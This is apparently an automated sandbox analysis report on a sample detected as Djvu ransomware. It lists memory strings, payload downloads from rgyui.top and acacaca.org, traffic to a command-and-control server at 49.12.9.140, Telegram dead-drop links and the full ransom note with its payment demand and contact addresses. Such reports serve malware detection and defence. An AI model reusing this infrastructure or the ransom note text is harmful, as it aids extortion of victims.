Source: 2OmglUwx83.exe, 00000008.00000002.617874262.0000000000859000.00000004.00000020.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000003.382768151.0000000000857000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000D.00000003.426193570.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000D.00000003.421331179.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000D.00000003.429044334.00000000006B6000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.618087943.0000000000697000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000D.00000003.420871473.00000000006BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 2OmglUwx83.exe, 00000000.00000002.355123959.0000000002290000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000001.00000002.363606430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000001.00000000.353098499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000001.00000000.351375798.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000006.00000002.382228538.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000007.00000002.424010722.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000000.379648338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000000.377762737.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000002.613049042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000000.392479956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000002.426411812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000000.389703574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000A.00000002.405620904.0000000002340000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000002.408000172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000000.398886429.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000000.397080958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000E.00000002.427528493.0000000002210000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000F.00000000.425104342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000F.00000000.423610387.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000F.00000002.430133993.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
Source: 2OmglUwx83.exe, 00000008.00000002.617874262.0000000000859000.00000004.00000020.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000002.618329989.000000000089D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://rgyui.top/dl/build2.exe
Source: 2OmglUwx83.exe, 00000008.00000002.619234248.00000000008B6000.00000004.00000020.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000002.618329989.000000000089D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://rgyui.top/dl/build2.exe$run
Source: 2OmglUwx83.exe, 00000008.00000002.617874262.0000000000859000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://rgyui.top/dl/build2.exerunb4e97Bx
Source: 2OmglUwx83.exe, 00000008.00000002.618329989.000000000089D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://rgyui.top/dl/build2.exe~
Source: 2OmglUwx83.exe, 00000008.00000003.446980506.0000000002F30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.amazon.com/
Source: 2OmglUwx83.exe, 00000008.00000003.448986440.0000000002F30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.google.com/
Source: 2OmglUwx83.exe, 00000008.00000003.449617423.0000000002F30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.live.com/
Source: 2OmglUwx83.exe, 00000008.00000003.450139669.0000000002F30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.nytimes.com/
Source: 2OmglUwx83.exe, 0000000F.00000002.430133993.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://www.openssl.org/support/faq.html
Source: 2OmglUwx83.exe, 00000008.00000003.450756863.0000000002F30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.reddit.com/
Source: 2OmglUwx83.exe, 00000008.00000003.451162735.0000000002F30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.twitter.com/
Source: 2OmglUwx83.exe, 00000008.00000003.451796823.0000000002F30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.wikipedia.com/
Source: 2OmglUwx83.exe, 00000008.00000003.459725373.0000000002F30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.youtube.com/
Source: build2.exe, 0000000D.00000003.428990871.00000000279A1000.00000004.00000800.00020000.00000000.sdmp, 05322493605623596985969059.13.dr, 71094135503925161979660642.13.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 2OmglUwx83.exe, 00000008.00000002.617874262.0000000000859000.00000004.00000020.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000003.382768151.0000000000857000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/J
Source: 2OmglUwx83.exe, 2OmglUwx83.exe, 00000001.00000002.363606430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000001.00000000.353098499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000001.00000000.351375798.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000006.00000002.382228538.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000007.00000002.424010722.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000000.379648338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000000.377762737.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000002.616576425.0000000000818000.00000004.00000020.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000003.382768151.0000000000857000.00000004.00000020.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000002.613049042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000000.392479956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000002.426411812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000000.389703574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000A.00000002.405620904.0000000002340000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000002.408000172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000000.398886429.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000000.397080958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000E.00000002.427528493.0000000002210000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000F.00000000.425104342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000F.00000000.423610387.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.json
Source: 2OmglUwx83.exe, 00000008.00000003.382768151.0000000000857000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsonrO
Source: 2OmglUwx83.exe, 00000008.00000002.617874262.0000000000859000.00000004.00000020.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000003.382768151.0000000000857000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/n
Source: build2.exe, 0000000D.00000003.428990871.00000000279A1000.00000004.00000800.00020000.00000000.sdmp, 05322493605623596985969059.13.dr, 71094135503925161979660642.13.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: build2.exe, 0000000D.00000003.428990871.00000000279A1000.00000004.00000800.00020000.00000000.sdmp, 05322493605623596985969059.13.dr, 71094135503925161979660642.13.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: build2.exe, 0000000D.00000003.428990871.00000000279A1000.00000004.00000800.00020000.00000000.sdmp, 05322493605623596985969059.13.dr, 71094135503925161979660642.13.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: build2.exe, 0000000D.00000003.428990871.00000000279A1000.00000004.00000800.00020000.00000000.sdmp, 05322493605623596985969059.13.dr, 71094135503925161979660642.13.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: build2.exe, 0000000D.00000003.421064532.00000000006AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: build2.exe, 0000000D.00000000.409643469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 0000000D.00000000.410137244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.613626255.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://mas.to/
Source: build2.exe, 0000000D.00000003.428990871.00000000279A1000.00000004.00000800.00020000.00000000.sdmp, 05322493605623596985969059.13.dr, 71094135503925161979660642.13.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: build2.exe, 0000000D.00000003.428990871.00000000279A1000.00000004.00000800.00020000.00000000.sdmp, 05322493605623596985969059.13.dr, 71094135503925161979660642.13.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: build2.exe, 0000000D.00000002.616887560.0000000000671000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/
Source: build2.exe, 0000000D.00000002.616887560.0000000000671000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/&
Source: build2.exe, 0000000D.00000003.421064532.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000D.00000003.421331179.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000D.00000000.409643469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 0000000D.00000000.410137244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.616887560.0000000000671000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.613626255.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/pegasusfly1
Source: build2.exe, 0000000D.00000003.421331179.00000000006BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/pegasusfly11
Source: build2.exe, 0000000D.00000002.616887560.0000000000671000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/pegasusfly17&A
Source: build2.exe, 0000000D.00000000.409643469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 0000000D.00000000.410137244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.613626255.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/pegasusfly1https://mas.to/
Source: build2.exe, 0000000D.00000002.616887560.0000000000671000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/pegasusfly1w
Source: 2OmglUwx83.exe, 00000008.00000002.620281101.00000000008DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://we.tl/t-QsoSRIeA
Source: 2OmglUwx83.exe, 00000008.00000002.619234248.00000000008B6000.00000004.00000020.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000002.620281101.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, _readme.txt0.8.dr String found in binary or memory: https://we.tl/t-QsoSRIeAK6
Source: build2.exe, 0000000D.00000003.420871473.00000000006BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web.telegram.org
Source: build2.exe, 0000000D.00000003.428990871.00000000279A1000.00000004.00000800.00020000.00000000.sdmp, 05322493605623596985969059.13.dr, 71094135503925161979660642.13.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown DNS traffic detected: queries for: api.2ip.ua
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 1_2_0040CF10
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /pegasusfly1 HTTP/1.1Host: t.me
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: rgyui.top
Source: global traffic HTTP traffic detected: GET /test2/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: acacaca.org
Source: global traffic HTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: acacaca.org
Source: global traffic HTTP traffic detected: GET /517 HTTP/1.1Host: 49.12.9.140:1080
Source: global traffic HTTP traffic detected: GET /2277399138.zip HTTP/1.1Host: 49.12.9.140:1080Cache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 09:22:43 GMTServer: Apache/2.4.37 (Win64) PHP/5.6.40Content-Length: 216Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 69 6c 65 73 2f 31 2f 62 75 69 6c 64 33 2e 65 78 65 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /files/1/build3.exe was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 05 Aug 2022 09:22:56 GMTContent-Type: application/zipContent-Length: 3642574Last-Modified: Mon, 04 Jul 2022 10:49:28 GMTConnection: keep-aliveETag: "62c2c5b8-3794ce"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 10 6e 55 53 4b 12 b5 9b fc b5 00 00 48 47 01 00 10 00 1c 00 76 63 72 75 6e 74 69 6d 65 31 34 30 2e 64 6c 6c 55 54 09 00 03 b0 6f 71 61 b0 6f 71 61 75 78 0b 00 01 04 00 00 00 00 04 00 00 00 00 ec fd 0b 40 54 d5 bb 38 0c ef 61 06 18 71 60 46 05 45 45 1d 15 6f e1 65 98 e1 3e c3 55 06 f1 82 0e 22 e0 0d 11 b9 38 20 02 c1 1e d4 14 45 07 ca 71 37 e5 af ac ac ac 34 ad 9f 95 95 95 99 99 19 88 09 98 29 5e 32 4b 2b 34 aa 4d 43 8a 4a 80 4a ce f7 3c 6b ef 81 01 c5 73 ce ff 7d cf 7b be f7 fb 0e ba f6 65 5d 9e f5 ac 67 3d b7 b5 f6 5a 6b e2 16 6e a5 84 14 45 89 20 58 ad 14 75 88 e2 fe 22 a8 ff f8 af 19 82 db 88 c3 6e d4 81 3e df 8e 3c 24 98 f5 ed c8 79 fa ec 22 79 41 61 fe f2 c2 b4 95 f2 f4 b4 bc bc 7c 5a be 2c 53 5e 68 c8 93 67 e7 c9 a3 e7 24 c8 57 e6 67 64 4e 76 75 75 f1 e6 61 08 ee ec 9e ad dd fe ed 30 5b b8 29 1a 35 6c 1a dc 67 d5 2f 19 36 9b c4 9d 1a 96 0b f7 1d 77 6b bd 12 c9 fd b4 57 12 b9 d7 78 45 92 fb d7 5e a9 e4 fe ad 57 34 b9 2b 87 71 f7 33 e4 7d 6e 76 ba 1e e1 da 70 d6 69 29 6a 96 c0 91 92 04 8d 5b 60 8b ab a7 46 8d ec 2b 70 eb 4b fd 09 2f 72 3e f2 03 08 32 82 21 45 9e f0 d9 81 a2 9c e0 e6 42 71 77 8e 50 02 42 bc 23 fd 1c 80 8e 11 91 a4 90 8c 2b c2 dd b9 db 7e 20 96 7b 1f 8a aa 90 09 a8 a7 31 52 2e a0 c4 22 3b 62 8a 05 54 6c 38 dc 15 02 6a 1b 54 b0 7f 04 45 05 3d 82 f6 ec 88 1e 7d 04 70 8f 3c 22 ff 64 3a 73 35 0d f7 e3 8d 3c 42 d8 56 51 f7 3c d0 f4 a5 93 33 d2 e8 34 78 8e 76 e2 db 0e 6d a6 ae 77 cf 07 f5 56 4c ce e6 32 1e 72 e4 ea 26 04 69 7e 20 5f c4 e4 c2 a2 c2 74 6c 9e 88 6b 33 c9 d7 fa b0 7c 99 b9 f9 90 11 db 8e 34 a0 24 70 ef 78 20 5f d4 23 9a f8 bf 7f ff 07 7f 05 63 e1 52 07 17 41 33 3e 6d 1d 07 97 88 f1 18 f7 18 26 fb 40 d0 e1 65 2b 5e 76 e2 65 3f 5e 2a f0 52 87 17 f9 44 b8 28 f0 12 81 97 7a bc c8 26 61 2a 5e a8 c9 f8 8a 97 a5 78 69 56 62 09 3f 4c 40 e6 56 04 23 bc 10 7c d5 e0 13 5e a8 50 2c 11 86 25 f0 52 81 97 7a bc 50 28 1d a5 78 59 1a 81 88 47 63 02 5e 28 2d 56 8e 97 02 f2 14 83 38 e3 65 29 5e b6 e2 85 9a 86 f5 e2 25 02 2f 4b f1 a2 98 8e f0 66 22 a6 78 69 c6 0b 35 0b f3 e1 25 02 2f a5 e4 35 0e d1 c0 4b c1 3b 18 87 97 ad 78 d9 8f 97 0a f2 f4 2e e6 7b 0f 81 e2 25 02 2f 4b f1 52 40 5e f7 61 09 bc d4 e1 85 68 96 f1 70 11 b4 e3 45 b4 1f 2e 8a fd 08 0a 2f e2 8f b0 ec c7 48 6c bc c8 3f 41 a0 78 89 c7 cb 8b 78 a1 3e 85 12 05 07 91 4c 5f 20 0d ea 10 fc 59 7c fd 1e 9f ae 60 63 7e c2 b2 bf 20 a8 7a c4 e0 37 c4 05 2f 4b 7f 87 b2 3b f1 52 f7 3b 26 b0 08 0a 55 81 ce 82 55 5a 1e e0 0f d4 7e a5 72 4a 06 99 64 0a 07 81 ac 14 02 c5 75 b6 6c af 3b 25 6b 80 20 f7 a0 64 b2 a1 94 cc 1b 42 04 84 79 10 68 08 fb 20 fe 10 84 0a 08 a7 20 5c 82 d0 00 a1 19 02 35 90 92 49 20 b8 43 f0 82 30 1e 82 1f 84 b0 81 9c d6 8c 80 7b 2c 04 1d 84 79 10 e6 43 58 0c 61 29 84 0c 08 7a 08 b9 10 56 43 58 07
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: 2OmglUwx83.exe, 00000008.00000003.448500733.0000000002F30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 2OmglUwx83.exe, 00000008.00000003.451162735.0000000002F30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
Source: 2OmglUwx83.exe, 00000008.00000003.459725373.0000000002F30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
Source: unknown HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----8838260965650276Host: 49.12.9.140:1080Content-Length: 118025Connection: Keep-AliveCache-Control: no-cache
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.7:49769 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.7:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.7:49774 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49775 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.7:49782 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.7:49785 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands
barindex
Found ransom note / readme
Source: C:\_readme.txt Dropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.You can get and look video overview decrypt tool:https://we.tl/t-QsoSRIeAK6Price of private key and decrypt software is $980.Discount 50% available if you contact us first 72 hours, that's price for you is $490.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:support@bestyourmail.chReserve e-mail address to contact us:datarestorehelp@airmail.ccYour personal ID:0531JhyjdMzCJ0Qyak6RQYKiwWrih4g2RGLy00AdNJY7bznA8 Jump to dropped file
Yara detected Djvu Ransomware
Source: Yara match File source: 15.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.2OmglUwx83.exe.22115a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.2OmglUwx83.exe.22a15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.2OmglUwx83.exe.22915a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.2OmglUwx83.exe.21f15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE
